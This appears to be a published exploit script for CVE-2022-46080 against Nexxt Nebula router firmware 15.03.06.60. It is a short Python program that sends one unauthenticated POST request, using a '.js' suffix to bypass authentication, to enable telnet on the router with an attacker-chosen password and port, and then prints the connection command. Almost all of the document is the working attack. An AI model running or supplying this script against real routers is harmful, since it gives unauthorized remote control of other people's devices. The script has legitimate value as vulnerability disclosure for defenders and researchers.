CVE-2022-46080.py

# Exploit Title: Nexxt Router Firmware 15.03.06.60 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 24/11/2022
# Exploit Author: Yerodin Richards
# Vendor Homepage: https://www.nexxtsolutions.com/
# Version: 15.03.06.60
# Tested on: Nexxt Nebula 1200-AC
# CVE : CVE-2022-46080

import requests
import sys


router_host = "http://192.168.0.1"
pw = "password"
port = "25"

def main():
    if '-h' in sys.argv or '--help' in sys.argv:
        print(f"Usage: {sys.argv[0]} HOST_URL PORT PASSWORD_TO_SET")
        exit(0)
    if len(sys.argv) > 3:
        router_host = sys.argv[1]
        pw = sys.argv[3]
        port = sys.argv[2]
    if send_payload(router_host, port, pw):
        print(f"connect to router using: `telnet {router_host.split('//')[1]} {port}` with password: {pw}")
    else:
        print("An error occurred :(")

def send_payload(h, p, pw):
    url = h+"/goform/SetTelnetCfg?reasy-ui-1.0.3.js"
    if 'errCode":0' in requests.post(url, data={"telnetEn":1, "telnetPwd":str(pw), "telnetPort":str(p)}).content.decode():
        return True
    return False


if __name__ == '__main__':
    main()